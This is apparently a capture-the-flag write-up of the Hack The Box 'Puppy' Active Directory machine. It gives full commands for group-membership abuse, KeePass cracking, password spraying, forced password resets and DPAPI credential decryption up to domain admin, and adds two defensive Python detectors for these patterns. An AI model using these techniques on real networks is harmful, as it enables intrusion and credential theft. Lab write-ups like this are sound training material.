Box Info
| Name | Difficulty |
|---|---|
| Puppy | Medium |
As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!
nmap
[Oct 06, 2025 - 16:35:47 (KST)] exegol-htb
puppy # nmap -sC -sS -sV -T4 "$TARGET_IP"
Starting Nmap 7.93 ( https://nmap.org ) at 2025-10-06 16:35 KST
Nmap scan report for puppy.htb (10.10.11.70)
Host is up (0.25s latency).
Not shown: 986 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-06 14:37:37Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open status 1 (RPC #100024)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-06T14:39:40
|_ start_date: N/A
|_clock-skew: 7h01m14s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 259.36 seconds
Open Services
- 88/tcp : kerberos
- 445/tcp : smb
- 389/tcp : LDAP
This appears to be an Active Directory environment.
Crack kdbx File
puppy # nxc smb dc.puppy.htb -u levi.james -p KingofAkron2025! -d puppy.htb --shares
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] puppy.htb\levi.james:KingofAkron2025!
SMB 10.10.11.70 445 DC [*] Enumerated shares
SMB 10.10.11.70 445 DC Share Permissions Remark
SMB 10.10.11.70 445 DC ----- ----------- ------
SMB 10.10.11.70 445 DC ADMIN$ Remote Admin
SMB 10.10.11.70 445 DC C$ Default share
SMB 10.10.11.70 445 DC DEV DEV-SHARE for PUPPY-DEVS
SMB 10.10.11.70 445 DC IPC$ READ Remote IPC
SMB 10.10.11.70 445 DC NETLOGON READ Logon server share
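SMB 10.10.11.70 445 DC SYSVOL READ Logon server share
After listing the SMB shares accessible with the given credentials, I tried connecting to the shares with READ permission, but the connection failed.
After collecting Active Directory data with the command below and loading it into BloodHound, I confirmed that the levi.james user belongs to the HR group.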
bloodhound-python \
-u 'levi.james' \
-p 'KingofAkron2025!' \
-d 'puppy.htb' \
-c all \
-dc 'dc.puppy.htb' \
-ns 10.10.11.70 \
--zip
Running bloodhound-quickwin showed that members of the HR group have GenericWrite over DEVELOPERS.
[Oct 06, 2025 - 17:39:06 (KST)] exegol-htb
puppy # bloodhound-quickwin -u neo4j -p exegol4thewin
▬▬ι═══════ﺤ BloodHound QuickWin @ kaluche_ -═══════ι▬▬
###########################################################
[*] Enumerating all domains admins (rid:512|519|544) (recursive)
###########################################################
[+] Domain admins (group) : DOMAIN [email protected]
[+] Domain admins (group) : ENTERPRISE [email protected]
[+] Domain admins (enabled) : [email protected] [LASTLOG: < 1 year]
[+] Domain admins (enabled) : [email protected] [LASTLOG: < 1 year]
###########################################################
[*] Enumerating privileges SPN
###########################################################
---
###########################################################
[*] Can configure Resource-Based Constrained Delegation
###########################################################
[+] RBCD : configure from [email protected] --> GenericWrite --> [email protected]
[+] RBCD : configure from SENIOR [email protected] --> GenericAll --> [email protected]
###########################################################
---
After adding the levi.james user to the DEVELOPERS group and checking permissions again with nxc, READ permission on the DEV share appeared.
[Oct 06, 2025 - 22:12:35 (KST)] exegol-htb
puppy # bloodyAD --host 'puppy.htb' -d 'dc.puppy.htb' -u 'levi.james' -p 'KingofAkron2025!' add groupMember 'DEVELOPERS' levi.james
[+] levi.james added to DEVELOPERS
I connected over SMB and downloaded the recovery.kdbx file.
puppy # smbclient \\\\puppy.htb\\DEV -U 'levi.james%KingofAkron2025!'
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Tue Oct 7 01:49:04 2025
.. D 0 Sun Mar 9 01:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 16:09:12 2025
Projects D 0 Sun Mar 9 01:53:36 2025
recovery.kdbx A 2677 Wed Mar 12 11:25:46 2025
5080575 blocks of size 4096. 1582686 blocks available
smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (2.0 KiloBytes/sec) (average 2.0 KiloBytes/sec)
I cracked the file using the keepass2john tool and successfully recovered the password liverpool.
[Oct 06, 2025 - 23:24:49 (KST)] exegol-htb
puppy # keepass2john recovery.kdbx > out.kbdx.hashes && john --wordlist=`fzf-wordlists` out.kbdx.hashes
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [AES/Argon2 32/64])
Cost 1 (t (rounds)) is 37 for all loaded hashes
Cost 2 (m) is 65536 for all loaded hashes
Cost 3 (p) is 4 for all loaded hashes
Cost 4 (KDF [0=Argon2d 2=Argon2id 3=AES]) is 0 for all loaded hashes
Will run 10 OpenMP threads
Note: Passwords longer than 41 [worst case UTF-8] to 124 [ASCII] rejected
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
liverpool (recovery)
1g 0:00:03:51 DONE (2025-10-06 23:29) 0.004315g/s 5.523p/s 5.523c/s 5.523C/s 123456..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
With that password, I used the pykeepass library to obtain the password stored for each account.
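from pykeepass import PyKeePass
# Open the database with the cracked master password
kp = PyKeePass('recovery.kdbx', password='liverpool')
# Print the title and stored password of every titled entry
for e in kp.entries:
    if e.title:
        print(e.title, ":", e.password or "")
[Oct 07, 2025 - 12:40:57 (KST)] exegol-htb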
puppy # python3 dump_kp.py
JAMIE WILLIAMSON : JamieLove2025!
ADAM SILVER : HJKL2025!
ANTONY C. EDWARDS : Antman2025!
STEVE TUCKER : Steve2025!
SAMUEL BLAKE : ILY2025!
For the account list, I saved the account names printed by nxc as shown below and then attempted logins with them.
[Oct 07, 2025 - 00:01:37 (KST)] exegol-htb
puppy # nxc smb "$TARGET_IP" -u 'levi.james' -p 'KingofAkron2025!' --users
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.10.11.70 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.70 445 DC Administrator 2025-02-19 19:33:28 4 Built-in account for administering the computer/domain
SMB 10.10.11.70 445 DC Guest <never> 4 Built-in account for guest access to the computer/domain
SMB 10.10.11.70 445 DC krbtgt 2025-02-19 11:46:15 0 Key Distribution Center Service Account
SMB 10.10.11.70 445 DC levi.james 2025-02-19 12:10:56 0
SMB 10.10.11.70 445 DC ant.edwards 2025-02-19 12:13:14 0
SMB 10.10.11.70 445 DC adam.silver 2025-10-06 21:49:29 9
SMB 10.10.11.70 445 DC jamie.williams 2025-02-19 12:17:26 4
SMB 10.10.11.70 445 DC steph.cooper 2025-02-19 12:21:00 4
SMB 10.10.11.70 445 DC steph.cooper_adm 2025-03-08 15:50:40 4
SMB 10.10.11.70 445 DC [*] Enumerated 9 local users: PUPPY
As shown below, I ran a brute-force attack over each account / password combination and found a credential that logs in successfully.
[Oct 06, 2025 - 23:59:29 (KST)] exegol-htb
puppy # nxc smb "$TARGET_IP" -u users.txt -p pass.txt
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-]
---
PUPPY.HTB\Guest:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
| user | password |
|---|---|
| ant.edwards | Antman2025! |
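
On the domain controller, the run above shows up as one source failing against many accounts and then succeeding once. The following is an added example (not part of the original write-up) that flags that pattern; the log line format, the 192.0.2.x source addresses and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, not real logs: time, event ID, source IP, target account.
# 4625 = failed logon, 4624 = successful logon; 192.0.2.x are documentation IPs.
SAMPLE = """\
2025-10-06T14:59:01 4625 192.0.2.10 Administrator
2025-10-06T14:59:02 4625 192.0.2.10 Guest
2025-10-06T14:59:03 4625 192.0.2.10 krbtgt
2025-10-06T14:59:04 4625 192.0.2.10 levi.james
2025-10-06T14:59:05 4625 192.0.2.10 adam.silver
2025-10-06T14:59:06 4625 192.0.2.10 jamie.williams
2025-10-06T14:59:07 4624 192.0.2.10 ant.edwards
2025-10-06T15:10:00 4625 192.0.2.44 steph.cooper
2025-10-06T15:10:20 4625 192.0.2.44 steph.cooper
2025-10-06T15:10:40 4624 192.0.2.44 steph.cooper
"""

def parse(text):
    """Yield (time, event_id, source_ip, lowercased account) per log line."""
    for line in text.splitlines():
        ts, eid, ip, user = line.split()
        yield datetime.fromisoformat(ts), int(eid), ip, user.lower()

def detect_spray(events, min_users=5, window=timedelta(minutes=5)):
    """Flag sources that fail against >= min_users distinct accounts within
    `window`, and record any account that source then logs on as."""
    fails = defaultdict(list)            # source IP -> [(time, account)]
    alerts = {}
    for ts, eid, ip, user in sorted(events):
        if eid == 4625:
            fails[ip].append((ts, user))
            recent = {u for t, u in fails[ip] if ts - t <= window}
            if len(recent) >= min_users:
                alert = alerts.setdefault(ip, {"targets": set(), "valid": []})
                alert["targets"] |= recent
        elif eid == 4624 and ip in alerts:
            alerts[ip]["valid"].append(user)   # the spray found a working password
    return alerts

if __name__ == "__main__":
    for ip, a in detect_spray(parse(SAMPLE)).items():
        print(ip, len(a["targets"]), "accounts tried; valid:", a["valid"])
```

The second source (one user mistyping their own password twice) stays below the distinct-account threshold and is not flagged.
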
Reset adam.silver Password


This account belongs to the SENIOR DEVS group, and I confirmed that it has GenericAll over the ADAM.SILVER user.
The ADAM.SILVER account also belongs to the REMOTE MANAGEMENT USERS group, so WinRM access looked possible.

I first tried logging in with the entry seen in the kdbx, ADAM SILVER : HJKL2025!, but it failed.
[Oct 08, 2025 - 00:11:35 (KST)] exegol-htb
puppy # nxc winrm dc.puppy.htb -u 'adam.silver' -p 'HJKL2025!'
WINRM 10.10.11.70 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:PUPPY.HTB)
WINRM 10.10.11.70 5985 DC [-] PUPPY.HTB\adam.silver:HJKL2025!
So I used the ant.edwards / Antman2025! account to change the adam.silver password and then tested winrm, but it failed with STATUS_ACCOUNT_DISABLED.
[Oct 08, 2025 - 00:14:47 (KST)] exegol-htb
puppy # bloodyAD --host 'puppy.htb' -d 'dc.puppy.htb' -u 'ant.edwards' -p 'Antman2025!' set password 'adam.silver' 'Testpw!'
[+] Password changed successfully!
[Oct 08, 2025 - 00:15:44 (KST)] exegol-htb
puppy # nxc smb dc.puppy.htb -u 'adam.silver' -p 'Testpw!'
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Testpw! STATUS_ACCOUNT_DISABLED
Checking in BloodHound confirmed that the Enabled property was indeed False, so I removed the disabled flag.

[Oct 08, 2025 - 00:23:57 (KST)] exegol-htb
puppy # bloodyAD --host puppy.htb -d puppy.htb -u 'ant.edwards' -p 'Antman2025!' remove uac 'adam.silver' -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
After confirming that the login succeeded, I connected with evil-winrm and obtained user.txt.
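
The directory changes made in this chain (a user adding themselves to a group, then a non-admin resetting the password of an account and enabling it) each leave a security event on the DC. The following is an added example, not part of the original write-up, that correlates them; the simplified event tuples, their timestamps, the `helpdesk.svc` account and the allowlist are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed, simplified events (not real logs):
# (time, event ID, subject = who acted, target account, group or None)
# 4728 = member added to a global security group,
# 4724 = password reset attempt, 4722 = user account enabled.
SAMPLE = [
    ("2025-10-06T13:12:35", 4728, "levi.james", "levi.james", "DEVELOPERS"),
    ("2025-10-07T15:14:47", 4724, "ant.edwards", "adam.silver", None),
    ("2025-10-07T15:23:57", 4722, "ant.edwards", "adam.silver", None),
    ("2025-10-07T16:00:00", 4724, "helpdesk.svc", "jamie.williams", None),
    ("2025-10-07T16:01:00", 4722, "helpdesk.svc", "jamie.williams", None),
]
EXPECTED_ADMINS = {"helpdesk.svc"}   # hypothetical allowlist for resets/enables

def find_takeovers(events, window=timedelta(minutes=30)):
    """Return (finding, subject, object) tuples for:
    - a principal adding itself to a group, and
    - one non-allowlisted subject both resetting the password of and
      enabling the same account within `window`, in either order."""
    findings, seen = [], {}
    for ts, eid, subject, target, group in sorted(events, key=lambda e: e[0]):
        when = datetime.fromisoformat(ts)
        if eid == 4728:
            if subject == target:
                findings.append(("self-added-to-group", subject, group))
        elif eid in (4722, 4724) and subject not in EXPECTED_ADMINS:
            other = 4722 if eid == 4724 else 4724
            prev = seen.get((subject, target, other))
            if prev is not None and when - prev <= window:
                findings.append(("reset-and-enable", subject, target))
            seen[(subject, target, eid)] = when
    return findings

if __name__ == "__main__":
    for finding in find_takeovers(SAMPLE):
        print(finding)
```
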

DPAPI Credential Decryption

I found a backup file under C:\Backups and downloaded it.


After extracting the downloaded archive and inspecting nms-auth-config.xml.bak, I obtained the password for the steph.cooper account and checked with nxc whether a winrm login works.
| user | password |
|---|---|
| steph.cooper | ChefSteph2025! |
After connecting with evil-winrm I ran winPEAS and confirmed that the steph.cooper_adm account is an Administrator.

winPEAS also found DPAPI-related information, so I went on to decrypt it.

https://infosecwriteups.com/decrypting-dpapi-credentials-offline-8c8f27207956
I decrypted the DPAPI files by following the blog post above.
There are other ways to decrypt them as well (e.g. mimikatz).
[Oct 08, 2025 - 23:29:47 (KST)] exegol-htb
puppy # dpapi.py masterkey -file ./DPAPI_Master_key/556a2412-1275-4ccf-b721-e6a0b4f90407 -sid 'S-1-5-21-1487982659-1829050783-2281216199-1107' -password 'ChefSteph2025!'
Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
[Oct 08, 2025 - 23:29:51 (KST)] exegol-htb
puppy # dpapi.py credential -file ./DPAPI_Creds_file/C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!
| user | Password |
|---|---|
| steph.cooper_adm | FivethChipOnItsWay2025! |
After confirming the successful winrm login, I connected with evil-winrm and obtained root.txt.

Summary
user.txt
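- Using the levi.james account, added levi.james to the Developers group
- Downloaded recovery.kdbx, recovered the credentials in it, and brute-forced them with nxc to obtain the ant.edwards account
- Followed the path ant.edwards → SENIOR DEVS → adam.silver to reset the adam.silver password, then connected with evil-winrm and obtained user.txt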
root.txt
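- Downloaded the zip file under C:\Backups and obtained the steph.cooper account from nms-auth-config.xml.bak
- Confirmed with winPEAS that the steph.cooper_adm user is an Administrator, identified the DPAPI-related files, and decrypted them with dpapi.py
- After decryption, logged in as steph.cooper_adm and obtained root.txt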
